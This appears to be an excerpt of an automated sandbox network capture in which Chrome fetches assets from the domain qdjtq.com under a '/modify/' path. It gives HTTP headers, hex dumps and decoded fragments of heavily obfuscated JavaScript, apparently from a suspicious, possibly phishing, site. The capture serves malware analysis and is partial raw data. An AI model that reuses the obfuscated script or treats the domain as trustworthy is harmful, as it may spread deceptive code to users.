            2024-09-27 00:29:34 UTC16384INData Raw: 78 31 36 37 31 33 31 5b 5f 30 78 33 36 32 62 64 37 28 30 78 31 63 65 29 5d 28 5f 30 78 34 37 66 33 39 30 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 62 65 38 66 31 30 3d 5f 30 78 33 36 32 62 64 37 3b 69 66 28 21 5f 30 78 34 37 66 33 39 30 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 5b 5f 30 78 62 65 38 66 31 30 28 30 78 32 30 33 29 5d 28 6e 65 77 20 45 72 72 6f 72 28 27 43 6f 75 6c 64 6e 5c 78 32 37 74 5c 78 32 30 72 27 2b 5f 30 78 62 65 38 66 31 30 28 30 78 31 66 36 29 2b 5f 30 78 62 65 38 66 31 30 28 30 78 32 39 33 29 2b 5f 30 78 33 66 36 30 65 64 2b 5f 30 78 62 65 38 66 31 30 28 30 78 32 36 64 29 2b 5f 30 78 63 37 34 31 34 61 5b 5f 30 78 62 65 38 66 31 30 28 30 78 31 66 39 29 5d 2b 27 5c 78 32 32 27 29 29 3b 63 6f 6e 73 74 20 5f 30 78 34 62 65 38 35 30 3d 6e
            Data Ascii: x167131[_0x362bd7(0x1ce)](_0x47f390=>{const _0xbe8f10=_0x362bd7;if(!_0x47f390)return Promise[_0xbe8f10(0x203)](new Error('Couldn\x27t\x20r'+_0xbe8f10(0x1f6)+_0xbe8f10(0x293)+_0x3f60ed+_0xbe8f10(0x26d)+_0xc7414a[_0xbe8f10(0x1f9)]+'\x22'));const _0x4be850=n
            2024-09-27 00:29:34 UTC4765INData Raw: 62 64 28 5f 30 78 37 33 39 65 63 35 5b 27 74 6f 27 5d 2c 5f 30 78 33 31 31 39 31 36 29 5b 5f 30 78 34 31 66 30 32 65 28 30 78 31 63 65 29 5d 28 5f 30 78 34 37 38 35 30 36 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 35 34 64 31 35 34 3d 5f 30 78 34 31 66 30 32 65 3b 49 28 5f 30 78 34 37 38 35 30 36 2c 30 78 31 34 29 26 26 21 5f 30 78 31 34 34 33 38 38 5b 5f 30 78 35 34 64 31 35 34 28 30 78 31 65 36 29 5d 26 26 5f 30 78 31 34 34 33 38 38 5b 5f 30 78 35 34 64 31 35 34 28 30 78 32 35 36 29 5d 3d 3d 3d 59 5b 27 70 6f 70 27 5d 26 26 5f 30 78 35 39 37 36 38 39 5b 27 67 6f 27 5d 28 2d 30 78 31 2c 21 30 78 31 29 3b 7d 29 5b 5f 30 78 34 31 66 30 32 65 28 30 78 31 65 37 29 5d 28 57 29 2c 50 72 6f 6d 69 73 65 5b 5f 30 78 34 31 66 30 32 65 28 30 78 32 30 33 29 5d 28 29 29 3a
            Data Ascii: bd(_0x739ec5['to'],_0x311916)[_0x41f02e(0x1ce)](_0x478506=>{const _0x54d154=_0x41f02e;I(_0x478506,0x14)&&!_0x144388[_0x54d154(0x1e6)]&&_0x144388[_0x54d154(0x256)]===Y['pop']&&_0x597689['go'](-0x1,!0x1);})[_0x41f02e(0x1e7)](W),Promise[_0x41f02e(0x203)]()):


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.649726129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:33 UTC581OUTGET /favicon.ico HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:34 UTC326INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:34 GMT
            Content-Type: image/vnd.microsoft.icon
            Content-Length: 38078
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"94be-1902494f420"
            2024-09-27 00:29:34 UTC16058INData Raw: 00 00 01 00 01 00 60 60 00 00 01 00 20 00 a8 94 00 00 16 00 00 00 28 00 00 00 60 00 00 00 c0 00 00 00 01 00 20 00 00 00 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
            Data Ascii: `` (`
            2024-09-27 00:29:34 UTC16384INData Raw: 57 ab 25 ff 57 ab 25 ff 57 ac 25 ff 57 ac 25 ff 57 ac 25 ff 57 ac 25 ff 58 ac 25 ff 50 a9 1a ff a0 c3 8b ff db d6 de ff d1 d1 d1 ff d0 d0 d0 ff ce ce ce ff cc cc cd ff c7 c7 c8 ff c6 c9 c4 ff f1 f3 f0 ff ff ff ff ff d8 ec cc ff 55 ab 22 ff 57 ac 25 ff 58 ac 26 ff 58 ac 26 ff 58 ac 26 ff 58 ac 27 ff 58 ac 27 ff 58 ac 27 ff 58 ac 27 ff 58 ac 27 ff 4f a7 1a ff 9d ce 80 ff ff ff ff ff bd bd bd 87 ff ff ff ff f9 fc f7 ff 6f b7 44 ff 52 a9 1f ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 58 ab 25 ff 58 ab 25 ff 58 ab 25 ff 58 ab 26 ff 57 ab 24 ff 51 a8 1d ff 4e a7 19 ff 52 a9 1e ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20
            Data Ascii: W%W%W%W%W%W%X%PU"W%X&X&X&X'X'X'X'X'OoDRW%W%W%W%W%W%W%W%W%X%X%X%X&W$QNRS S S S S S S S S S
            2024-09-27 00:29:34 UTC5636INData Raw: 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6b bd 4b ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c bd 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4c ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 6c be 4d ff 65 bb 45 ff 92 cf 7c ff ff ff ff
            Data Ascii: kKkKkKkKkKkKkKkKkKkKkKkKlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlLlMlMlMlMlMlMlMlMlMlMlMlMeE|


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.649729184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:34 UTC239OUTGET /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
            Range: bytes=0-2147483646
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-09-27 00:29:34 UTC514INHTTP/1.1 200 OK
            ApiVersion: Distribute 1.1
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF06)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-weu-z1
            Cache-Control: public, max-age=58546
            Date: Fri, 27 Sep 2024 00:29:34 GMT
            Content-Length: 55
            Connection: close
            X-CID: 2
            2024-09-27 00:29:34 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.649727129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:35 UTC364OUTGET /modify/assets/index-7c1edef8.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:36 UTC364INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:35 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 503862
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:38 GMT
            ETag: W/"7b036-19024953a70"
            2024-09-27 00:29:36 UTC16020INData Raw: 76 61 72 20 61 33 38 5f 30 78 33 39 61 63 66 63 3d 61 33 38 5f 30 78 32 31 36 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 66 36 61 32 37 2c 5f 30 78 33 66 33 35 33 30 29 7b 76 61 72 20 5f 30 78 64 66 36 34 62 34 3d 61 33 38 5f 30 78 32 31 36 33 2c 5f 30 78 34 38 30 38 32 31 3d 5f 30 78 33 66 36 61 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 39 37 31 64 38 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 31 62 30 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 36 63 32 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 34 63 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 64 66 36 34 62 34 28 30 78 32 39
            Data Ascii: var a38_0x39acfc=a38_0x2163;(function(_0x3f6a27,_0x3f3530){var _0xdf64b4=a38_0x2163,_0x480821=_0x3f6a27();while(!![]){try{var _0x4971d8=-parseInt(_0xdf64b4(0x1b0))/0x1+parseInt(_0xdf64b4(0x6c2))/0x2+parseInt(_0xdf64b4(0x4ca))/0x3*(-parseInt(_0xdf64b4(0x29
            2024-09-27 00:29:36 UTC16384INData Raw: 30 3d 5f 30 78 33 66 35 61 30 38 3d 3e 42 65 28 5f 30 78 33 66 35 61 30 38 29 26 26 5f 30 78 33 66 35 61 30 38 21 3d 3d 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 33 39 33 29 26 26 5f 30 78 33 66 35 61 30 38 5b 30 78 30 5d 21 3d 3d 27 2d 27 26 26 27 27 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 66 35 61 30 38 2c 30 78 61 29 3d 3d 3d 5f 30 78 33 66 35 61 30 38 2c 54 72 3d 54 30 28 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 34 36 33 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 33 32 32 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 65 31 29 2b 27 64 65 42 65 66 6f 72 65 4d 6f 27 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 36 34 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 65 32 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30
            Data Ascii: 0=_0x3f5a08=>Be(_0x3f5a08)&&_0x3f5a08!==a38_0x39acfc(0x393)&&_0x3f5a08[0x0]!=='-'&&''+parseInt(_0x3f5a08,0xa)===_0x3f5a08,Tr=T0(a38_0x39acfc(0x463)+a38_0x39acfc(0x322)+a38_0x39acfc(0x5e1)+'deBeforeMo'+a38_0x39acfc(0x564)+a38_0x39acfc(0x5e2)+a38_0x39acfc(0
            2024-09-27 00:29:36 UTC16384INData Raw: 7d 2c 27 68 61 73 27 28 5f 30 78 33 61 31 37 33 36 29 7b 76 61 72 20 5f 30 78 33 32 35 66 64 61 3d 5f 30 78 64 66 37 30 39 37 3b 72 65 74 75 72 6e 20 62 72 5b 5f 30 78 33 32 35 66 64 61 28 30 78 37 35 30 29 5d 28 74 68 69 73 2c 5f 30 78 33 61 31 37 33 36 2c 21 30 78 30 29 3b 7d 2c 27 61 64 64 27 3a 67 74 28 27 61 64 64 27 29 2c 27 73 65 74 27 3a 67 74 28 5f 30 78 64 66 37 30 39 37 28 30 78 35 30 36 29 29 2c 27 64 65 6c 65 74 65 27 3a 67 74 28 27 64 65 6c 65 74 65 27 29 2c 27 63 6c 65 61 72 27 3a 67 74 28 5f 30 78 64 66 37 30 39 37 28 30 78 36 63 38 29 29 2c 27 66 6f 72 45 61 63 68 27 3a 44 72 28 21 30 78 30 2c 21 30 78 30 29 7d 3b 72 65 74 75 72 6e 5b 5f 30 78 64 66 37 30 39 37 28 30 78 36 32 32 29 2c 5f 30 78 64 66 37 30 39 37 28 30 78 35 34 37 29 2c 5f
            Data Ascii: },'has'(_0x3a1736){var _0x325fda=_0xdf7097;return br[_0x325fda(0x750)](this,_0x3a1736,!0x0);},'add':gt('add'),'set':gt(_0xdf7097(0x506)),'delete':gt('delete'),'clear':gt(_0xdf7097(0x6c8)),'forEach':Dr(!0x0,!0x0)};return[_0xdf7097(0x622),_0xdf7097(0x547),_
            2024-09-27 00:29:36 UTC16384INData Raw: 34 61 35 31 38 34 7d 3d 5f 30 78 31 66 37 32 37 65 2c 5f 30 78 32 64 34 33 62 65 3d 5f 30 78 33 32 65 35 37 36 5b 5f 30 78 33 38 39 34 66 39 28 30 78 32 61 32 29 2b 27 6e 73 27 5d 3b 69 66 28 5f 30 78 31 66 37 32 37 65 5b 5f 30 78 33 38 39 34 66 39 28 30 78 31 64 33 29 5d 7c 7c 5f 30 78 31 66 37 32 37 65 5b 5f 30 78 33 38 39 34 66 39 28 30 78 34 37 30 29 5d 29 72 65 74 75 72 6e 21 30 78 30 3b 69 66 28 5f 30 78 34 33 64 66 66 31 26 26 5f 30 78 34 61 35 31 38 34 3e 3d 30 78 30 29 7b 69 66 28 5f 30 78 34 61 35 31 38 34 26 30 78 34 30 30 29 72 65 74 75 72 6e 21 30 78 30 3b 69 66 28 5f 30 78 34 61 35 31 38 34 26 30 78 31 30 29 72 65 74 75 72 6e 20 5f 30 78 33 32 39 63 32 64 3f 52 73 28 5f 30 78 33 32 39 63 32 64 2c 5f 30 78 31 31 36 30 66 62 2c 5f 30 78 32 64
            Data Ascii: 4a5184}=_0x1f727e,_0x2d43be=_0x32e576[_0x3894f9(0x2a2)+'ns'];if(_0x1f727e[_0x3894f9(0x1d3)]||_0x1f727e[_0x3894f9(0x470)])return!0x0;if(_0x43dff1&&_0x4a5184>=0x0){if(_0x4a5184&0x400)return!0x0;if(_0x4a5184&0x10)return _0x329c2d?Rs(_0x329c2d,_0x1160fb,_0x2d
            2024-09-27 00:29:36 UTC16384INData Raw: 30 78 32 36 62 65 31 35 2c 5f 30 78 34 34 32 31 65 35 29 7c 7c 64 65 28 5f 30 78 33 62 34 39 32 31 2c 5f 30 78 34 34 32 31 65 35 29 7c 7c 64 65 28 75 72 2c 5f 30 78 34 34 32 31 65 35 29 7c 7c 64 65 28 5f 30 78 35 31 64 36 62 62 5b 27 63 6f 6e 66 69 67 27 5d 5b 5f 30 78 34 37 36 62 33 64 28 30 78 32 63 39 29 2b 27 65 72 74 69 65 73 27 5d 2c 5f 30 78 34 34 32 31 65 35 29 3b 7d 2c 27 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 27 28 5f 30 78 62 39 65 61 39 39 2c 5f 30 78 32 64 37 61 62 35 2c 5f 30 78 61 36 30 37 64 29 7b 76 61 72 20 5f 30 78 37 66 31 65 33 34 3d 61 33 38 5f 30 78 33 39 61 63 66 63 3b 72 65 74 75 72 6e 20 5f 30 78 61 36 30 37 64 5b 27 67 65 74 27 5d 21 3d 6e 75 6c 6c 3f 5f 30 78 62 39 65 61 39 39 5b 27 5f 27 5d 5b 5f 30 78 37 66 31 65 33 34 28
            Data Ascii: 0x26be15,_0x4421e5)||de(_0x3b4921,_0x4421e5)||de(ur,_0x4421e5)||de(_0x51d6bb['config'][_0x476b3d(0x2c9)+'erties'],_0x4421e5);},'defineProperty'(_0xb9ea99,_0x2d7ab5,_0xa607d){var _0x7f1e34=a38_0x39acfc;return _0xa607d['get']!=null?_0xb9ea99['_'][_0x7f1e34(
            2024-09-27 00:29:36 UTC16384INData Raw: 2c 5f 30 78 34 36 33 39 61 31 29 29 2c 5f 30 78 32 39 62 33 62 39 21 3d 6e 75 6c 6c 26 26 21 79 65 28 5f 30 78 32 39 62 33 62 39 29 26 26 28 5f 30 78 32 39 62 33 62 39 3d 6e 75 6c 6c 29 3b 63 6f 6e 73 74 20 5f 30 78 34 36 36 62 39 62 3d 6a 61 28 29 2c 5f 30 78 33 65 38 30 66 65 3d 6e 65 77 20 53 65 74 28 29 3b 6c 65 74 20 5f 30 78 64 31 65 39 39 3d 21 30 78 31 3b 63 6f 6e 73 74 20 5f 30 78 33 37 33 33 30 30 3d 5f 30 78 34 36 36 62 39 62 5b 27 61 70 70 27 5d 3d 7b 27 5f 75 69 64 27 3a 62 6c 2b 2b 2c 27 5f 63 6f 6d 70 6f 6e 65 6e 74 27 3a 5f 30 78 34 36 33 39 61 31 2c 27 5f 70 72 6f 70 73 27 3a 5f 30 78 32 39 62 33 62 39 2c 27 5f 63 6f 6e 74 61 69 6e 65 72 27 3a 6e 75 6c 6c 2c 27 5f 63 6f 6e 74 65 78 74 27 3a 5f 30 78 34 36 36 62 39 62 2c 27 5f 69 6e 73 74
            Data Ascii: ,_0x4639a1)),_0x29b3b9!=null&&!ye(_0x29b3b9)&&(_0x29b3b9=null);const _0x466b9b=ja(),_0x3e80fe=new Set();let _0xd1e99=!0x1;const _0x373300=_0x466b9b['app']={'_uid':bl++,'_component':_0x4639a1,'_props':_0x29b3b9,'_container':null,'_context':_0x466b9b,'_inst
            2024-09-27 00:29:36 UTC16384INData Raw: 27 73 75 62 54 72 65 65 27 5d 3d 5f 30 78 34 36 34 32 35 65 2c 5f 30 78 32 65 64 39 38 66 28 5f 30 78 32 38 33 38 31 65 2c 5f 30 78 34 36 34 32 35 65 2c 5f 30 78 34 31 62 66 63 32 28 5f 30 78 32 38 33 38 31 65 5b 27 65 6c 27 5d 29 2c 5f 30 78 34 61 37 63 66 37 28 5f 30 78 32 38 33 38 31 65 29 2c 5f 30 78 35 36 35 61 30 39 2c 5f 30 78 61 38 31 34 61 32 2c 5f 30 78 33 35 35 39 31 30 29 2c 5f 30 78 32 31 65 32 64 32 5b 27 65 6c 27 5d 3d 5f 30 78 34 36 34 32 35 65 5b 27 65 6c 27 5d 2c 5f 30 78 33 35 39 37 38 61 3d 3d 3d 6e 75 6c 6c 26 26 47 75 28 5f 30 78 35 36 35 61 30 39 2c 5f 30 78 34 36 34 32 35 65 5b 27 65 6c 27 5d 29 2c 5f 30 78 34 61 66 64 30 34 26 26 4e 65 28 5f 30 78 34 61 66 64 30 34 2c 5f 30 78 61 38 31 34 61 32 29 2c 28 5f 30 78 32 30 65 65 36 64
            Data Ascii: 'subTree']=_0x46425e,_0x2ed98f(_0x28381e,_0x46425e,_0x41bfc2(_0x28381e['el']),_0x4a7cf7(_0x28381e),_0x565a09,_0xa814a2,_0x355910),_0x21e2d2['el']=_0x46425e['el'],_0x35978a===null&&Gu(_0x565a09,_0x46425e['el']),_0x4afd04&&Ne(_0x4afd04,_0xa814a2),(_0x20ee6d
            2024-09-27 00:29:36 UTC16384INData Raw: 6d 69 63 43 68 69 27 2b 5f 30 78 35 33 63 35 37 38 28 30 78 33 62 36 29 5d 2c 5f 30 78 32 61 39 62 33 35 2c 5f 30 78 65 66 35 61 64 2c 5f 30 78 31 37 35 31 30 35 2c 5f 30 78 32 32 32 35 62 64 2c 5f 30 78 31 31 34 39 39 37 2c 5f 30 78 32 37 63 32 66 35 29 2c 51 30 28 5f 30 78 35 33 34 63 37 61 2c 5f 30 78 31 36 65 38 64 62 2c 21 30 78 30 29 29 3a 5f 30 78 66 61 31 61 38 63 7c 7c 5f 30 78 32 31 30 35 31 33 28 5f 30 78 35 33 34 63 37 61 2c 5f 30 78 31 36 65 38 64 62 2c 5f 30 78 65 66 35 61 64 2c 5f 30 78 62 33 37 61 35 65 2c 5f 30 78 31 37 35 31 30 35 2c 5f 30 78 32 32 32 35 62 64 2c 5f 30 78 31 31 34 39 39 37 2c 5f 30 78 32 37 63 32 66 35 2c 21 30 78 31 29 2c 5f 30 78 35 37 61 36 39 32 29 5f 30 78 33 38 62 32 65 63 7c 7c 52 72 28 5f 30 78 31 36 65 38 64 62
            Data Ascii: micChi'+_0x53c578(0x3b6)],_0x2a9b35,_0xef5ad,_0x175105,_0x2225bd,_0x114997,_0x27c2f5),Q0(_0x534c7a,_0x16e8db,!0x0)):_0xfa1a8c||_0x210513(_0x534c7a,_0x16e8db,_0xef5ad,_0xb37a5e,_0x175105,_0x2225bd,_0x114997,_0x27c2f5,!0x1),_0x57a692)_0x38b2ec||Rr(_0x16e8db
            2024-09-27 00:29:36 UTC16384INData Raw: 63 66 63 28 30 78 34 33 63 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 34 38 62 29 2b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 36 63 29 2c 4f 74 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 3c 27 75 27 3f 64 6f 63 75 6d 65 6e 74 3a 6e 75 6c 6c 2c 55 73 3d 4f 74 26 26 4f 74 5b 61 33 38 5f 30 78 33 39 61 63 66 63 28 30 78 35 63 61 29 2b 27 65 6e 74 27 5d 28 27 74 65 6d 70 6c 61 74 65 27 29 2c 4a 6c 3d 7b 27 69 6e 73 65 72 74 27 3a 28 5f 30 78 31 39 37 62 30 39 2c 5f 30 78 31 30 37 62 30 66 2c 5f 30 78 35 62 32 36 31 30 29 3d 3e 7b 76 61 72 20 5f 30 78 34 66 31 33 65 61 3d 61 33 38 5f 30 78 33 39 61 63 66 63 3b 5f 30 78 31 30 37 62 30 66 5b 5f 30 78 34 66 31 33 65 61 28 30 78 34 37 36 29 2b 27 72 65 27 5d 28 5f 30 78 31 39 37 62 30 39 2c 5f
            Data Ascii: cfc(0x43c)+a38_0x39acfc(0x48b)+a38_0x39acfc(0x56c),Ot=typeof document<'u'?document:null,Us=Ot&&Ot[a38_0x39acfc(0x5ca)+'ent']('template'),Jl={'insert':(_0x197b09,_0x107b0f,_0x5b2610)=>{var _0x4f13ea=a38_0x39acfc;_0x107b0f[_0x4f13ea(0x476)+'re'](_0x197b09,_
            2024-09-27 00:29:36 UTC16384INData Raw: 36 34 37 66 2c 5f 30 78 35 34 33 37 36 37 29 3a 5f 30 78 35 63 63 35 36 65 5b 5f 30 78 33 32 33 30 39 37 5d 3d 5f 30 78 35 34 33 37 36 37 3b 7d 72 65 74 75 72 6e 20 5f 30 78 35 63 63 35 36 65 3b 7d 63 6f 6e 73 74 20 41 63 3d 53 79 6d 62 6f 6c 28 29 3b 66 75 6e 63 74 69 6f 6e 20 42 63 28 5f 30 78 35 61 63 33 64 37 29 7b 76 61 72 20 5f 30 78 63 36 36 32 66 63 3d 61 33 38 5f 30 78 33 39 61 63 66 63 3b 72 65 74 75 72 6e 21 79 30 28 5f 30 78 35 61 63 33 64 37 29 7c 7c 21 5f 30 78 35 61 63 33 64 37 5b 27 68 61 73 4f 77 6e 50 72 6f 70 27 2b 5f 30 78 63 36 36 32 66 63 28 30 78 36 33 39 29 5d 28 41 63 29 3b 7d 63 6f 6e 73 74 20 7b 61 73 73 69 67 6e 3a 5f 74 7d 3d 4f 62 6a 65 63 74 3b 66 75 6e 63 74 69 6f 6e 20 46 63 28 5f 30 78 66 39 32 36 31 35 29 7b 76 61 72 20
            Data Ascii: 647f,_0x543767):_0x5cc56e[_0x323097]=_0x543767;}return _0x5cc56e;}const Ac=Symbol();function Bc(_0x5ac3d7){var _0xc662fc=a38_0x39acfc;return!y0(_0x5ac3d7)||!_0x5ac3d7['hasOwnProp'+_0xc662fc(0x639)](Ac);}const {assign:_t}=Object;function Fc(_0xf92615){var


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.649728129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:35 UTC363OUTGET /modify/assets/7f8692c3ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:36 UTC361INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:36 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 4610
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:30 GMT
            ETag: W/"1202-19024951b30"
            2024-09-27 00:29:36 UTC4610INData Raw: 63 6f 6e 73 74 20 61 32 30 5f 30 78 32 33 38 38 31 34 3d 61 32 30 5f 30 78 39 37 34 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 62 31 37 37 2c 5f 30 78 35 36 62 35 64 65 29 7b 63 6f 6e 73 74 20 5f 30 78 36 33 65 66 37 36 3d 61 32 30 5f 30 78 39 37 34 33 2c 5f 30 78 33 61 36 64 66 37 3d 5f 30 78 31 32 62 31 37 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 33 32 37 39 61 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 65 66 37 36 28 30 78 31 37 30 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 65 66 37 36 28 30 78 31 37 61 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36 33 65 66 37 36 28 30 78 31 38 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 36
            Data Ascii: const a20_0x238814=a20_0x9743;(function(_0x12b177,_0x56b5de){const _0x63ef76=a20_0x9743,_0x3a6df7=_0x12b177();while(!![]){try{const _0x3279a0=-parseInt(_0x63ef76(0x170))/0x1*(-parseInt(_0x63ef76(0x17a))/0x2)+-parseInt(_0x63ef76(0x18a))/0x3*(-parseInt(_0x6


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.649734129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC555OUTGET /modify/assets/297557e4tE5dP.css HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
